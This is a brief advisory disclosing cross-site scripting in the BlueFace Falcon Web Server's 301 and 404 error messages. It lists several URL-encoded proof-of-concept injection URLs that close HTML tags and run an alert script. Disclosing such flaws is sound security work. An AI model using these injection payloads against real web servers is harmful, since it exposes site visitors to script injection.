BlueFace Falcon Web Server Error Message Cross-Site Scripting Vulnerability

BlueFace Falcon Web Server Error Message Cross-Site Scripting Vulnerability

The following examples were submitted by Matt Murphy <mattmurphy@kc.rr.com>:

* 301 Message XSS

Closing TITLE tag:
http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A HREF:
http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A tag:
http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

* 404 Message XSS

http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/

The 301 examples will simply add a slash and pass it on to the browser,
which then raises a 404, exploiting that vulnerability as well (although the
301 exploits will cause some useless HTML to be added on)